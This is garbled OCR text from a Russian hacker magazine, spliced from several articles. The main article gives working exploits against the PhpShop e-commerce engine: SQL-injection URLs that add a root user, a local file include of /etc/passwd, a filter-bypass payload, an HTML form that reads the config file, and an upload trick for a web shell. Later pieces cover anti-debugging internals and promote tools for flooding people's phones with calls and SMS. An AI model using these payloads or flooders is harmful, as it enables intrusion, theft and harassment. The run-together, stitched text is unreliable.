книги хакеры / журнал хакер / 114_Optimized

Уязвимыйкод—Location—отсутствуетвызовdie()

движкомнесоставилотруда—наофициальномсайтегордо красовалсяраздел«Нашиклиенты».Позжевыяснилось

—околотретиадминистраторовнеудосужилисьизменить пароль.Ктомуже,криптостойкостьпаролейоставляетжелать лучшегоизавязаналишьнаалгоритмеbase64.Непросто небрежноеотношениекбезопасности,апрямо-такиплевокв сторонукриптографиииБрюсаШнаера,вчастности!

Сразупослеустановкидвижкаиисследованиядампаяпроверилоднуизсамыхраспространенныхошибокприсоздании инсталлятора—егосамоудаление.Конечноже,оноотсутс- твовало.Почемуэтоважно?Деловтом,чтоинсталляторесли

инеудаляется,тохотябыблокируется,заносяспециальную пометкувБД,вконфиг,какой-либофайлит.п.Новнекоторых случаяхможно,такилииначе,обманутьпроверку,переставив движокзановоивойдявсистемуподдефолтным/указанным приинсталляциипароле.Либо,используяуязвимостьзаписи данныхвконфиг,можновписатьвнегопроизвольныйphp-код

иполучитьвеб-шелл.Обычноэтоимеетсмысл,когдахакера неинтересуетсодержаниеБДсайта;онпреследуетиныецели

изаранеезнает,какзалитьшелл,укладываязаботыпореанимациисайтанаплечиадмина.

Внашемслучаеполучаетсяполныйсуповойнабор—пациента прощепристрелить,чемлечить.Во-первых,впапкеконфига лежитphpinfo(),доступныйлюбомужелающему:

/install/rewritemodtest/rewritemodtest.php

Во-вторых,скриптинсталляцииуязвимкSQL-инъекции.При register_globals=ON хакерможетопределитьнеопределеннуюпеременнуюCsvContentивыполнитьлюбую SQL-команду!

/install/install.php?install=2&CsvContent=I NSERT%20INTO%20phpshop_users%20VALUES%20(66 6,0,0x726f6f74,0x636d397664413d3d,0x726f6f7 4,1);%0A2

Такмыдобавляемновогопользователяrootcпаролемroot.

Код /install/install.php уязвимый к SQL-inj: if(@$install == 2){

........

$IdsArray2=split(";\n",$CsvContent); array_pop($IdsArray2);

while (list($key, $val) = each($IdsArray2)) $result=mysql_query($val);

В-третих,скриптапдейтаверсииуязвимклокальномуинклуду посредствомпереопределенияпеременныхчерезextract():

/install/update/install.php?SysValue[file][e rror]=../../../etc/passwd

Уязвимыйкод—eregi_replace—обходфильтрации

Код/install/update/install.phpуязвимыйк[LFI]

$SysValue=parse_ini_file("../../phpshop/inc/ config.ini",1);

….. @extract($_GET); @extract($_POST); @extract($_FORM); @extract($_FILES);

…... include("../../

".$SysValue['file']['error']);

Междуделомяпоинтересовалсяалгоритмомгенерации capcha-кода,призванногозащищатьновостныекомментыот флудерастов.Вреализацияхмногихпубличныхалгоритмов содержатсяошибки,позволяющиеботуприкинутьсяживым человеком.Атыдумаешь,откудаберутсявсякиескриптыдля посылкихалявныхSMS?

session_start(); $text=substr(md5(session_id()),0,5);

Быстро стало ясным, что такой тест Тьюринга обойти просто, как два байта. Значение session_id() поступает напря-

мую в COOKIE: PHPSESSID=session_id , откуда бот его без труда сграбит и, сгенерировав валидный ответ, превратит новостные комменты в настоящий модераторский ад.

Спустя некоторое время после просмотра исходников я наткнулся на «защиту» от возможных SQL-injection. Следующий кусок кода вызвал не просто улыбку, а приступ дикого смеха:

// Secure Fix 3.0

function RequestSearch($search){ $search=eregi_replace("union","",$search); $search=eregi_replace("select","",$search); $search=eregi_replace("insert","",$search); $search=eregi_replace("update","",$search); $search=eregi_replace("delete","",$search); return $search;

}

Деловтом,чтоиз-заотсутствиярекурсиитакойподходбеспо- лезен.«Вредные»операторывырезаютсяоднократно,азначит,мыможемвложитьодиноператорвдругойи,врезультате, получитьнавыходеизфильтравалидныйquery:

Antichat' uniunionon selselectect 1,2,3,4 from table_name/*

Насталовремядесерта,тоестьSQL!Всефайлыдвижка,кроме индексного,былинезазендены.

info

•Как правило, при переустановке движка БД удаляется или повреждается, поскольку не все инсталляторы способны менять префикс таблиц или создавать новую БД. Обычно требуется заранее создать их через phpmyadmin (до нача-

ла установки). Также конфиг может иметь систему автобэкапа,

итогда при создании шелла через запись в конфигурационный файл удастся вернуть прежние настройки без потери данных. Если возможно, то

сразу после получения шелла на сервере, хакер, заметая следы, восстановит исходный конфиг, будто бы ничего и не случилось.

•Посвоемуопыту могусказать,что зазенденныескрипты в90%случаевимеют уязвимости.Подвум причинам.Первая

—скриптзендятнедля защитыилиоткражи, ажелаяскрытьнизкое качествокода.Вторая

—зенденныйскрипт избегаетанализасорсовдругимилюдьми,а тот,ктоегораззендит, нераспространяет результатысвоихизысканий.Какследствие

—наличиескрытых багов,которые,поверь мне,живуточень долго.

•Непервыйраз замечаю,чтоесли движоккрасиво выполнен(верстка,

дизайн,flash,web2.0),

тоphp-код,наверняка, кривой.Инаоборот:).

Пропустивindex.phpчерездезендер,яполучилдовольнокорявый,но удобочитаемыйлистинг.Впечатлениепортилобфусцированыйвиднекоторыхпеременных(видимо,программистыпрошлисьпонимдлястраховки). Нонесуть,главное,чтоизучениеисходникадаловозможностьотследить вызовипередачупараметровуязвимымфункцияминакопатьнехилую кучкуинъекций,работоспособныхприmagic_quotes=OFF:

/index.php?nav=1&name='[SQL]

/index.php?IDbaner='[SQL]

/index.php?page=meta&nav=page&name='[SQL]

/index.php?page=meta&nav=page&name=news&id='[SQL]

Небольшоеотступление:настоятельнорекомендуюпослеустановкималоизвестногодвижкаобязательнопроверятьутилиты,доступныетолькоадминистратору,напредметнеавторизованногодоступа,атакжевсеплагины,библиотеки,расширенияипр.Срединихмогутпопастьсясамописные илиустаревшиеверсии,уязвимыекразличныматакамлибопростокриво настроенные.Например,[adodb_lite]или [fckeditor].Вэтотраз мнепопалсябажныйскриптдампераБД /phpshop/admpanel/dumper/ backup/download.php,читающийлюбойфайлнасервере.Смотрисам:

<? if(isset($backup)){

require("../../connect.php");

@mysql_connect ("$host", "$user_db", "$pass_db")or @ die("Невозможно подсоединиться к базе"); mysql_select_db("$dbase")or @die("Невозможно подсоеди-

ниться к базе"); require("../../enter_to_admin.php"); header('Content-Type: application/force-download');

header('Content-Disposition: attachment; filename="'.$ backup.'"');

header('Content-Length: '.filesize($backup)); readfile($backup);

}

else header("Location ./"); ?>

Такойбагпрощевсегозаюзатьизбраузерачерезhtml-форму:

<form action="http://target.com/phpshop/admpanel/ dumper/backup/download.php" method=POST >

<input type="text" name="backup" value="../../../inc/ config.ini" size=50>

<input type="submit"> </form>

Погонявдвижоквбраузере,яобратилвниманиенадовольночастые редиректы.Значит,вскриптахиспользуетсялибомногоJavaScript,либо

header('Location: xxx').Еслитычиталмоюстатью«РоковыеошибкиPHPv2»,топомнишь,чтоеслипослелокэйшеннепоставитьexit()или die(),тоphp-кодпродолжитсвоевыполнение,абраузерпроигнорирует контентпослередиректа,ивнешневсебудетвыглядеть,какнадо.Но используячто-либопомимобраузера,безразличноекзначениямвхидере, можноувидетьостаточныйконтент.Недолгодумая,яполезсмотретьфункциюавторизации:

/phpshop/admpanel/enter_to_admin.php function BadUser(){

if($this->OkFlag == 0) header("Location: ./");

}

Налицототсамыйслучай.Фактически,придоступевадминкунаспускают, норедиректмешаетнамувидетьжеланное.ВоспользуемсяInetCrack’ом илиIntruder’ом,чтобыувидетьостаточныйконтентответа.Пошлемтакой пакет,гдеid—номерюзверя:

GET /phpshop/admpanel/users/adm_userID.php?id=1 HTTP/1.0

Host: localhost

Вответмыполучимстраничкуадминки,накоторойотображенпрофиль админасегологиномипаролемвbase64.Дляполнотыкартиныотснифаем пакетсозданияновогоадминистратора:

POST http://localhost/phpshop/admpanel/users/adm_ users_new.php HTTP/1.0

Host: localhost Content-Length: 605

Content-Type: multipart/form-data; boundary=----------mq4IEbqXXtE192f59zkoLw — mq4IEbqXXtE192f59zkoLw

Content-Disposition: form-data; name="mail_new" admin@mail.ru

— mq4IEbqXXtE192f59zkoLw

Content-Disposition: form-data; name="status_new" 0

— mq4IEbqXXtE192f59zkoLw

Content-Disposition: form-data; name="enabled_new" 1

— mq4IEbqXXtE192f59zkoLw

Content-Disposition: form-data; name="login_new" root

— mq4IEbqXXtE192f59zkoLw

Content-Disposition: form-data; name="password_new" toor

— mq4IEbqXXtE192f59zkoLw

Локальныйинклудвдемонстрации

links

Чтобы внести пропаганду реального аудита, привожу несколько ссылок на проверенные компании, которые

помогут тебе провести жесткий пентест твоих движков:

•forum.antichat. ru/forum110.html

•www.ptsecurity. ru/serv_pen.asp

•itdefence.ru/content/ view/reverse/

•www.solidsolutions. ru/consulting/

•www.belsec.com/ services.html

•www.tet-service. ru/audit/

Content-Disposition: form-data; name="editID" OK

— mq4IEbqXXtE192f59zkoLw--

Теперьосталосьнайтинадежныйспособвыполненияпро- извольногоPHP-кода(несчитаянайденноговышеинклуда) и—придолжномвезении—выгрузкувфайлчерезmysqlв

случаеfile_priv=1.

Подробноеизучениеадминкиговорилоотом,чтозагрузки файлов,кромедампови.csv, вродекакнет.Внимательно покопавшисьвплагинах,яобнаружилзатерянный[fckeditor], возможностикоторогоявноиспользовалисьнедоконца. Поможемраскрытьемусвойпотенциал!Способностьюк загрузкеобладаетфайлconnector.phpпоадресу:/phpshop/ admpanel/editor2/editor/filemanager/browser/ default/connectors/php/connector.php.

Изучивнастройкивконфиге,яосознал,чтополитикабезопасностинастроенапопринципу«чтонезапрещено,торазрешено».Этобылооченькстати.Единственнымпрепятствием оказалисьфильтрынарасширение:

1:$Config['DeniedExtensions']['File']=array ('php','asp','aspx','ascx','jsp','cfm','cfc' ,'pl','bat','exe','dll','reg') ;

2:$pos=stristr($sFileName, "php");

3:$pos=stristr($sOriginalFileName, "php");

Однакотакаяпроверкавесьмасыраяинеполная,поскольку естьещеубойныерасширения«.phtml»и«.cgi».Длязаюзыванияэтойбрешимнеосталосьнабросатьудобнуюформочку:

<form action="http://localhost/phpshop/

xàêåð 06 /114/ 08

admpanel/editor2/editor/filemanager/browser/

default/connectors/php/connector.php?Comma

nd=FileUpload&Type=File&CurrentFolder=./" method=POST enctype="multipart/form-data"> <input type="file" name='NewFile'>

<input type="submit"> </form>

Файлыгрузятсяв/UserFiles/File/.Скриптпроводит аутентификациюпользователя,потомунадопредварительно войтиподадмином.

И это все?

Наэтомаудитможнозакончить.Каквидишь,былинайдены самыеразнообразныебаги,комбинированиекоторыхпозво- ляетполучитьправаадминистратора+веб-шелл.Остается толькогадать,каквсеэтонебылообнаруженопринаправлен- нойsecurity-проверке,которуюпроходилдвиг.Шуткиради

янемногоподправилкопирайтнаофициальномсайте.Пару недельназапрос«йабажныйсайтенг:)»ондажевылазилв топГугла.

Метрыбажногокоданезнаютконцаиграниц,впрочем,как инекомпетентностьмногихпрограммистовввопросахбе- зопасностисвоихпродуктов.Ноеслиподумать—всевполне

логично.Программерспециализируетсянавопросахкомпактности,скоростиипрактическойработоспособностисвоего кода,аненапоискеуязвимыхмест,пограничныхсостояний, утечекпамятиит.п.Привлечениестороннихспециалистов

—правильныйиразумныйподход.Вконечномитогеэтодает высокуюкачественнуюсоставляющуювсехпоказателей продукта.Правда...невэтотраз.Вобщем,помни—тывсегда можешьзаказатьмнеанализдвижкалюбойсложности.z

dvd

Файлы и программы, упоминаемые в статье, ищи на нашем диске.

warning

Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несет!

video

На диске, прилагаемом к журналу, ты найдешь видео-урок, демонстрирующий основные шаги взломщика.

061

Крис Касперски

управлениекоду,породившемуисключение.Ориентируясьнатиписключения(trapилиfault),управлениепередаетсялибомашиннойкоманде, сгенерировавшейисключение,либоследующейинструкции(подробнееоб этомможнопрочитатьвманулахотIntel).

Списокобработчиковструктурныхисключенийпредставляетсобойпростойодносвязанныйсписок:

Форматспискаобработчиковструктурныхисключений

_EXCEPTION_REGISTRATION ends

Процедураобработкиструктурныхисключенийимеетследующийпрототип ивозвращаетодноизтрехзначений:EXCEPTION_CONTINUE_SEARCH,

EXCEPTION_CONTINUE_EXECUTIONилиEXCEPTION_EXECUTE_ HANDLER,описанныевMSDN.

Прототиппроцедуры-обработчика структурныхисключений

handler(PEXCEPTION_RECORD pExcptRec, PEXCEPTION_ REGISTRATION pExcptReg,

Обработчикиструктурныхисключенийпрактическиполностьюреентера- бельны—обработчиктакжеможетгенерироватьисключения,корректно подхватываемыесистемойиначинающиераскруткуспискаобработчиковс нуля.«Практически»—потомучто,еслиисключениевозникаетприпопыт- кевызоваобработчика(например,из-заисчерпаниястека),ядропросто молчаливоприбиваетпроцесс.Ноэтоужедебритехническихдеталей,в которыемыпоканебудемуглубляться.

Послеустановкисвоегособственногообработчиканезабывайегоснимать, иначеестьшансполучитьвесьманеожиданныйрезультат.Причем,система игнорируетпопыткуснятьобработчиквнутрисамогообработчика,иэто нужноделатьтолькозапределамиеготела.

Вотабсолютныйминимумзнаний,которыйнампонадобитсядлябрачных игрсоструктурнымиисключениями.

VEH fundamentals

НачинаясXP,появиласьподдержкавекторныхисключений,являющаяся разновидностьюSEH,однакореализованнаянезависимоотнееиработающаяпараллельно.Другимисловами,добавлениеновоговекторногообра- ботчиканикакнезатрагиваетSEH-цепочкуи,соответственно,наоборот. Механизмобработкивекторныхисключенийработаетпотомужепринципу, чтоиSEH,вызываяужезнакомуюнамфункциюNTDLL.DLL!KiUserCal lbackDispatcher.ВсвоюочередьонавызываетNTDLL.DLL!RtlCal lVectoredExceptionHandlers,раскручивающуюсписоквекторных обработчиковспоследующейпередачейуправления.

SEHиVEHконцептуальнооченьсхожи.Онипредоставляютаналогич-

ныевозможностиивсяразницамеждунимивтом,чтовместоручного манипулированиясоспискамиобработчиковтеперьунасестьAPI-функ­ цииAddVectoredExceptionHandler/RemoveVectoredExcepti onHandler,устанавливающие/удаляющиевекторныеобработчикииз списка,указательнакоторыйхранитсявнеэкспортируемойпеременной

_RtlpCalloutEntryList внутриNTDLL.DLL(поодномуэкземпляруна каждыйпроцесс).Плюс,упростилосьнаписаниелокальных/глобальных обработчиковисключений,чтовслучаесSEH—большаяпроблема.Но,по- прежнему,векторнаяобработкапридерживаетсяпринципа«социального кодекса»:всеобработчикидолжныследоватьопределеннымправилами ничтонемешаетодномуизнихобъявитьсебясамымглавнымипослать другихнахрен.

Поскольку9x/W2Kсистемыещедостаточноширокораспространены,пользоватьсявекторнойобработкойбезособойнатонуждымогуттолькодураки.

Вовсякомслучае,необходимоиспользоватьдинамическуюзагрузкувекторныхфункций,экспортируемыхбиблиотекойKERNEL32.DLLи,еслиих тамнеокажется,либовыдатьсообщениеобошибке,либодезактивировать защитныймодуль,работающийнабазеVEH.

ТеперьпарусловоновыхAPI-функциях.AddVectoredExceptionHand lerимеетследующийпрототипипринимаетдвапараметра,первыйиз которыхобычноравеннулю,авторойпредставляетуказательнаобработчиквекторныхисключений:

ПрототипAPI-функцииAddVectoredExceptionHandler,

добавляющийновыйвекторныйобработчиквсписок

PVOID WINAPI AddVectoredExceptionHandler(

ULONG FirstHandler,

PVECTORED_EXCEPTION_HANDLER VectoredHandler);

ФункцияAddVectoredExceptionHandlerопределенавфайлеwinnt. h,поставляемомсновымиверсиямиSDK,даито,тольковтомслучае,если впрограммеопределенмакрос_WIN32_WINNTсозначением0x0500или большим.ЕслиунаснетсвежегоSDK,тоопределитьпрототипможнои самостоятельно,прямопоместуиспользованияфункции.

Прототиппроцедурыобработкивекторныхисключений

LONG CALLBACK VectoredHandler(

PEXCEPTION_POINTERS ExceptionInfo);

Дляудаленияранееустановленныхвекторныхобработчиковизсписка можновоспользоватьсяAPI-функциейRemoveVectoredExceptionHand ler,гдеHandler—указательнаобработчик:

ПрототипAPI-функцииRemoveVectoredExceptionHandler,удаляющей векторныйобработчикизсписка

ULONG WINAPI RemoveVectoredExceptionHandler(

PVOID Handler);

Эксперимент #4 — ловля TF-бита на SEH

Продемонстрируем технику отладки программ, использующих структурные исключения, на примере crackme (его сорцы ищи на DVD). Он генерирует общую ошибку доступа к памяти путем обращения по нулевому указателю и проверяет значение флага трассировки в заранее установленном SEH-обработчике. На самом деле, для запутывания хакера назначается сразу два обработчика — первый ничего не делает и тупо

ОшибкаOllyDbg

Привозникновенииисключения(неважнокакого)отладчикOllyDbg останавливаетвыполнениепрограммы,предлагаянамнажать <Shift-F7/F8/F9>дляпродолжения.Первыедвекомбинациипере-

брасываютнасвначалоNTDLL.DLL!KiUserExceptionDispatch er,предоставляявозможностьсамостоятельноотслеживатьмомент передачиуправлениянаSEH/VEH-обработчик.А<Shift-F9>выпол- няетобработчикна«автопилоте»иостанавливаетотладчиктолько навыходеизнего.Вслучаедвухнашихcrackmeэтобудеткоманда, расположеннаянепосредственноза mov eax,[eax].

Сказанноесправедливотолько,когдафлагтрассировкисброшен,и программавыполняласьпоRun(илиStepOverсгенерациейисклю- чениявнутриover-функции).Еслижефлагтрассировкибылвзведен (программаисполняласьвпошаговомрежиме),топривыходеиз обработчикаструктурного/векторногоисключения,OllyDbgиз-за ошибкив«движке»передаетпрограмметрассировочноеисключение INT 01h,вызываяобработчикповторно.ВнашемслучаеэтоприводиткувеличениюрегистраEIP ещенадвабайтаи,какследствие,к крахупрограммы.ВOllyDbg2.00cуказаннаяошибкадосихпорне исправлена,чтоужаснонапрягает.

TF-SEH.bat—сборкапрограммыбезстартовогокода

cl /Ox /c TF-SEH.c

link TF-SEH.obj /ALIGN:16 /DRIVER /FIXED /ENTRY:nezumi /SUBSYSTEM:CONSOLE KERNEL32.LIB USER32.lib

Компилируемпрограммуизагружаемеевлюбойподходящийотладчик (например,SoftICE).Еслизагрузкаобламывается(известныйглюкSoftICE), раскомментируемстрокускомандойint 03h,пересоберемпрограмму,

напишемвSoftICE:«i3here on»изапустимвсепоновой.SoftICEпослушновсплываетнастрокеmov ecx, fs:[0],имысоспокойнойсовестью начинаемтрассировку.Доходимдокомандыmov eax,[eax] ивследую- щиймоментпереносимсякуда-товнутрьсистемы,аконкретнее—вначало функцииNTDLL.DLL!KiUserCallbackDispatcher,адрескоторойв моемслучаеравен77F91BB8h.

Приехали!Дальшепродолжатьтрассировкунетсмысла,нуженспособбыст­ ронайтиадресструктурногообработчика.Например,можнопосмотреть, чтонаходитсявпамятипоуказателюFS:[00000000h]:

ОпределениеспискаадресовSEH-обработчиков путемпросмотраfs:0

:d ss:12FFB4 ; смотрим структуру EXCEPTION_

REGISTRATION :d ss:012FFB4

0023:0012FFB4 0012FFBC 004002A3 FFFFFFFF 0040028A 0023:0012FFC4 79458989 FFFFFFFF 0012FA34 7FFDF000

Ага, мы видим, что в FS:[00000000h] содержится адрес 0012FFB4h, переходя по которому мы обнаруживаем структуру EXCEPTION_ REGISTRATION: {0012FFBC, 004002A3}, где первое двойное слово

— указатель на следующий SEH-обработчик, а второе — указатель на сам обработчик:

Дизассемблерныйлистингпервого

SEH-обработчикавцепочке

Упс, первый SEH-обработчик не содержит ничего интересного и просто возвращает управление следующему обработчику, поэтому, используя первое двойное слово структуры EXCEPTION_REGISTRATION, мы переходим по адресу 12FFBCh и видим следующую запись — EXCEPTION_ REGISTRATION: {FFFFFFFFh, 0040028Ah}. В данном случае она расположена рядом с первой, однако так бывает далеко не везде и не всегда, но это и неважно. Главное, мы получили адрес очередного обра-

ботчика — 0040028Ah.

Дизассемблерныйлистингвторого SEH-обработчикавцепочке

:u 40028A

Программа:SkypePhoneKiller ОС:Windows2000/XP

Автор:ZloandGrom

ФлудимчерезSkype

Настраницахжурналамынеразупоминалиотакой забавнойиполезнойштуке,какфлудмобильников. Представьсебе,какможнодосадитьчеловеку, разорвавеготелефоннепрерывнымизвонка- ми/sms-сообщениями,аужпрото,какприятно сорватьделовуювстречуконкурентовявообще молчу.Однимсловом,наиболеепредприимчивые товарищидавносмекнули,вчемпользателефонногофлуда.Поэтомуперейдемотсловкделуи рассмотримнезаменимыйинструмент—софтину

SkypePhoneKiller.Начнемпопорядку:

1.СперваустанавливаемпрограммуSKYPE. Вкомплектестулзойидетоднаизпоследних

версий.Впредьпрогуможноскачиватьнаофи-

циальномсайте:www.skype.com/intl/ru.

2.ПослезавершенияустановкиСкайпаинсталимфлудер.ДляэтогозаходимвпапкуskypeflooderизапускаемфайлSetup.

3.Теперьзапускаемехе’шникSkypePhoneKiller, которыйнаходитсявпапкеskype-flooder,и начинаемосваиватьфункциитулзы:).

4.Вполе«контакт»вбиваемномертелефона того,когобудемфлудить.Причем,номерследует указыватьвмеждународномформате,например: +7хххххххххх(дляРоссии).Жмемнакнопкус надписью«Добавить».Номерпопадаетвокошко «списоксмертников».Повсемномерамвэтом окошкепрограммабудетзвонитьпоочереди.

5.Заходимв«Настройки»ирегулируемфункции: •  «Разговорпродолжать»—черезуказанноеко-

личествосекундпрограммаброситтрубку,когда

еевозьмутстойстороны.Если«0сек»—бросает сразу.Советуюоставить«0»подефолту,чтобыне кушаламногоденег.

•  «Ожиданиеответа»—сколькосекундбудетидти дозвон,поканеснимуттрубку.Подефолтустоит«30», надосказать,чтоэтовполнеприемлемыйвариант:). 6.ЗапускаемSkype,заинсталенныйранее, авторизуемсянасвоемаккаунте,пополняем баланс(неменее$1)иразрешаемсофтине SkypePhoneKillerюзатьСкайпсамостоятельно. Теперьтыможешьсоставитьсписокжертв ижатьна«Старт»вприветливомокошке

SkypePhoneKiller’а.Кстати,баланствойбудет оставатьсянапрежнемуровне,ибодажепри дефолтовыхнастройкахтулзабросаеттрубкупри дозвоне.Вобщем,лучшефлудераненайти:). ПоблагодаримребятсWHBзаэтотприватный релизутилы,респект:).

Программа: AcunetixWebVulnerability Scanner

ОС:Windows2000/XP Автор:Acunetix

Одинизлучшихсканероввеб-уязвимостей

Средимножествасамыхразнообразныхсканеров,появившихсявпоследнеевремя,поройне так-топростонайтиподходящий.Посемухочу представитьтвоемувниманиюодинизпостоянно обновляющихсясканероввеб-уязвимостейот компанииAcunetix—AcunetixWebVulnerability Scanner.Тулзапредназначенадляпроверкина такиевеб-уязвимости,какsql-injection,xss,php- include,etc.Онаавтоматическиобнаруживает следующиебаги:

•Cross site scripting — выполне-

ние вредоносного сценария в браузере пользователя при обращении и в контексте безопасности доверенного сайта

•SQL injection — выполнение SQL-за-

просов из браузера для получения несанкционированного доступа к данным

•База данных GHDB (Google hacking database) — перечень типовых запросов, используемых хакерами всего мира для получения несанкционированного доступа к web-приложения и сайтам

•Выполнение кода

•Обход ограничений на доступ к каталогам

•Вставка файлов (File inclusion)

•Раскрытие исходного текста сценария (aka просмотр сорцов :)

•CRLF injection

•Cross frame scripting

•Общедоступные резервные копии файлов и папок (aka поиск бэкапов в веб-директориях)

•Файлы и папки, содержащие важную информацию

•Файлы, которые могут содержать информацию, необходимую для проведения атак (системные логи, журналы трассировки приложений и т.д.)

•Файлы, содержащие листинг каталогов

•Каталоги с низким уровнем защиты, позволяющие создавать, модифицировать или удалять файлы

Крометого,сканерумеетидентифицироватьзадейст­ вованныесерверныетехнологии(WebDAV,FrontPage ит.д.)иразрешениенаиспользованиепотенциально опасныхhttp-методов(PUT,TRACE,DELETE).

Пожалуй,единственныйминус—платность полнофункциональнойверсии.Хотя,захороший софтнежалкозаплатить,правда?

Программа:Nikto

ОС:*nix/WIn Автор:CIRT,Inc.

Еще один знаменитый сканер уязвимостей, который не нуждается в дополнительном представлении — Nikto. Софтина отличается

•Если веб-сайт требует авторизацию, Nikto легко сможет пройти ее (естественно, зная корректные имя пользователя и пароль)

•Если веб-демон не найден на стандартном 80 порту, Nikto попробует найти его на любом другом

•Для увеличения скорости работы поддерживается интеграция с nmap’ом

основныхвозможностейможновыделить:

•Сканирование портов + выводит список возможных Троянов

•Dir scan

•sub domain scan

•CGI scan (по словам автора, пока не доделан)

Популярныйperl-сканер

от аналогов, прежде всего, тем, что полностью реализована на Perl, благодаря чему одинаково приятно эксплуатируется как на *nix, так и на Win-платформах. Сканер под­ держивает SSL-соединение, работу через прокси и много чего еще. В базе собрана информация о более чем 3000 опасных уязвимостей в CGI-сценариях и ошибках HTTP-серверов (стандартные пароли, открытые для чтения файлы конфигурации и т.п.). С помощью подключаемых модулей утила обретает высокую функциональность, поэтому не поленись посмотреть в папку /plugins :). Для полноценной работы Nikto необходимо установить свежую версию Perl’а, модули

NET::SSLeay, LibWhisker, а также OpenSSL (в

случае использования на Win-платформах

— модуль Net::SSL), если требуется поддержка SSL-соединений.

Сканер хорош в тестировании удаленных хостов на наличие различных уязвимостей:

•В базе программы имеется информация о более чем 3200 уязвимых веб-сцена-

риях, а также 625 веб-демонов

•Инфа об уязвимостях оформляется в виде специальных плагинов, что позволяет расширять базу без апдейта самого приложения

•Nikto поддерживает автоматические обновления, поэтому за новыми плагинами не придется вручную вылезать в Сеть

•Анти-IDS методы — еще одна отличительная черта Nikto. Опытные администраторы нередко устанавливают системы обнаружения вторжения и таким образом обламывают разного рода сканирования. В отличие от других сканеров, использующих Perl-библио-

теку Libwhisker, Nikto не определя-

ется IDS-системой

•В ядре программы заложены различные stealth-методы, позволяющие замаскировать свою работу под обычные пользовательские запросы

•Если возможно, Nikto самостоятель-

но определит директорию с CGI-скрип-

тами и проверит ее на наличие бажных сценариев

•Полноценная поддержка прокси (с

возможностью авторизации), а также SSL-соединения при правильном подходе гарантируют твою безопасность

Программа:SMSflooder+spamer ОС:*nix/WIn

автор: DX

Флудиммобильники

Еслитулзудляфлудамобильниковпутемнепрерывныхзвонковмыужерассмотрели,тотеперьнастало времясмс-флуда.Хочуобратитьтвоевниманиена софтинкуSMSflooder+spamer,написаннуюнаPHP.

Переднамифлудер-спамерSMS,работающий черезMail.ru.Онпозволяетслатьзаданноечисло сообщенийнаопределенныйномерилипоодному сообщениюнаномераиззаданногосписка.Для работыскриптанужны:N-ноечислоаккаунтовmail.ru ихостсподдержкойPHPифункцийсокетов.Скрипт имеетудобныйвеб-интерфейсипредставляет собойфункциональнуюпанельуправленияфлудом, реализованнуюспомощьютехнологииAJAX.Объемы рассылокнапрямуюзависятотколичествааккаунтов (которыетыможешьприобрестинабольшинстве хак-форумовпоприемлемойцене).Скриптпозволяет указыватьтекстsms-сообщения,формироватьлисты отправки,рандомизироватьмессаги,etc.Такжеты можешьвручнуюуказатьинтервалыожиданиямежду отправками,указавсоответствующиезначенияперед запускомфлудера.Однимсловом,еслитырешил немногопрорекламироватьсвойтоварилипопортить

-тожизнь—этатулзаспециальнодлятебя.

Программа:PHPSecurityScanner ОС:*nix/WIn

автор: DX

Удобныйскриптовыйсканер

Иногдаслучаетсятак,чтоустановитьполноценныйсканернепредставляетсявозможнымпо причиненедостаткаправ.Вэтойситуациина помощьприходятразличныескриптовыеутилы, предназначенныедлясканированияпортови

ВниксахивВиндескриптследуетзапускатьиз консоли:

Example: php scan.php -h antichat. ru -full

Чтобыпоказатьвсенаглядно,рассмотримпримерсканапроизвольногохоста:

[-] Black Cat v 1.1 (betta)

[+]Target IP: 78.110.50.112

[+]Target Hostname: ********.ru

[+]Target Port: 80

[+]Time out: 0.5

[+]Start Time: 01.06.59

[+]Ping Time: 0.02

--------------------------------

Port Scan

--------------------------------

21 FTP — File Transfer Protocol [Control]

22 SSH — SSH (Secure Shell) Remote Login Protocol

25 SMTP — Simple Mail Transfer Protocol

53 DOMAIN — Domain Name Server

80 WWW-HTTP — World Wide Web HTTP (Hyper Text Transfer Protocol) 110 POP3 — Post Office Protocol

— Version 3

119 NNTP — Network News Transfer Protocol

----------------------------------

Scan port: 59

Open port: 52

Domen Scan

----------------------------------

********.com

----------------------------------

Scan domen: 11 Find domen: 1 Dir Scan

---------------

[*] Found: host.com/admin/ || 200[*] Found: host.com/admin/ || 200[*] Found: host.com/catalog/ || 200[*] Found: host.com/films/ || 200[*] Found: host.com/images/ || 403[*] Found: host.com/passwd/ || 300[*] Found: host.com/perl/ || 500[*] Found: host.com/products/ || 200[*] Found: host.com/server-status/ || 200[*] Found: host.com/server-info/ || 200[*] Found: host.com/video/ || 200 zz

Профайл: Script

Крестный отец кардинга